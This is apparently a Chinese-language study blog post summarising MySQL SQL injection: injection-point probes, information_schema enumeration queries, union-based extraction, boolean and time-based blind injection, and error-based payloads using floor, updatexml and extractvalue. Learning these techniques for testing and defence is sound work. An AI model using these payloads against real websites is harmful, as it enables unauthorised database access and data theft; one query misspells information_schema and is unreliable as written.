SQL注入总结·

2019-04-01  本文已影响0人  屈大帅

MySQL数据库初始的数据库有:

information_schema,mysql,performance_schema与test。


SQL注入难点:盲注,延时注入,文件导出;

在有些浏览器中,可以使用'--+'进行注释但不能使用'#';

SQL注入实质:就我自己而言所理解的SQL注入是注入的内容与前面的SQL语句重新构造成一个新的SQL语句来完成自己的需求。

SQL注入刚开始时要判断是否有注入点;

常用的判断方法(url):

/?id=1--+

/?id=1'--+

/?id=1"--+

/?id=1')--+

/?id=0' or 1=1--+

/?id=1' and 1=0--+

常用函数:

1. version()——MySQL 版本

2. user()——数据库用户名

3. database()——数据库名

4. @@datadir——数据库路径

5. @@version_compile_os——操作系统版本

常用连接函数:

1. concat(str1,str2,...)——没有分隔符地连接字符串

2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串

3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据


排序(order by)

如果我们需要对读取的数据进行排序,我们就可以使用 MySQL 的order by子句来设定你想按哪个字段哪种方式来进行排序,再返回搜索结果

order by使用:

你可以使用任何字段来作为排序的条件,从而返回排序后的查询结果。

 默认情况下,它是按升序排列。

你可以添加 WHERE...LIKE 子句来设置条件。

联合查询:

union操作符:

union操作符用于合并两个或多个select语句的结果集。

union内部的select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。

每条select语句中的列的顺序必须相同。

多个select语句会删除重复的数据。

联合查询需要建立在有显示位的基础上。输入id=0(-1)的原因是如果输入一个有意义的值,那么网页就会返回一个相应的值,这时,它会覆盖后面联合查询出的结果,所以要用一个无意义的值来避免覆盖。我们在知道显示位的时候可以在相应的位置写入希望查询的语句。

查询函数:

group_concat:将数据呈一行显示,有的时候数据过多没办法使用的时候可以用limit来对输出的数据进行限制。

db_name:你想查找的数据库的名字

tb_name:你想查找的数据表的名字

col_name:你想查找的字段的名字(字段=列)

常用查询语句:

查询所有数据库名:

select group_concat(schema_name) from information_schema.schemata

查询当前数据库:
select database();

查询数据库的所有数据表:

select group_concat(table_name) from information_schema.tables where table_schema='db_name'

查询字段名:

1.select group_concat(column_name) from infromation_schema.columns where table_schema='db_name' and table_name='tb_name'

2.Select column_name from information_schema.columns where table_name='dbname'

查询数据:select group_concat(col_name) from db_name.tb_name

盲注

盲注的分类:

基于布尔 SQL 盲注

基于时间的 SQL 盲注

基于报错的 SQL 盲注

盲注常用的函数:

mid()函数

mid(string,start,length)

mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位


substr()函数

substr(string,start,length)

substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值


left()函数

left(string,length)

left(database(),1)>’s’           //database()显示数据库名称,left(a,b)从左侧截取 a 的前 b 位


string:规定要返回的字符串。

start:规定在字符串的何处开始(初始值为1)。

length:规定被返回字符串的长度(可以省略,若省略则返回剩余所有文本)。

在比较的时候可以直接使用单引号>‘s’,也可以先转换位ascii码的形式再进行比较。

布尔盲注的原理是根据页面返回的是true还是false来判断比较的字母是否正确。例如,如果数据库的第一个字母在ASCII表中小于与100相对应的字母,那么就会返回正常情况下的成功页面;如果不小于的话,就会返回错误的页面。


报错注入:

报错注入也是盲注的一种,应该为基于盲注的报错注入。目的是构造 payload 让信息通过错误提示回显出来。

常用报错方式:

floor报错:

▲and (select 1 from(select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) 

floor()函数原本为向下取整,其中rand()函数为随机数生成,不能于order by共用,数据记录必须有两条以上

▲Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))

a from information_schema.columns group by a;

▲select count(*) from information_schema.tables group by concat(version(),

floor(rand(0)*2))

▲select count(*) from (select 1 union select null unionselect !1) group by concat(version(),floor(rand(0)*2))

此处有三个点,一是需要 concat 计数,二是 floor,取得 0 or 1,进行数据的重复,三是 group by 进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。

updatexml报错:

and updatexml(1,payload,1)

语句对payload的返回类型做了限制,只有在payload返回的不是xml格式才会生效,查询时使用的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,出现查询结果。

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误

extractvalue()报错:

and extractvalue(1, payload)

其中payload是想要输入的查询子句。

extractvalue(1,concat(0x7e,(select @@version),0x7e))

//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误


报错注入我使用的并不熟练,在此感谢大佬的文章SQL注入大法 - 简书


延时注入

sleep(n):网页延迟n秒输出结果;

if(a,b,c):if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c;

length(database()):返回当前数据库名长度;

If(ascii(substr(database(),1,1))>115,0,sleep(5))--+

//if 判断语句,条件为假,执行 sleep


以上所述只是简单的基础操作,在实际的SQL注入中还有许多需要注意的问题。

如:导入导出,宽字节注入……

但基础操作和中心思想却没有大的变化。

上一篇下一篇

猜你喜欢

热点阅读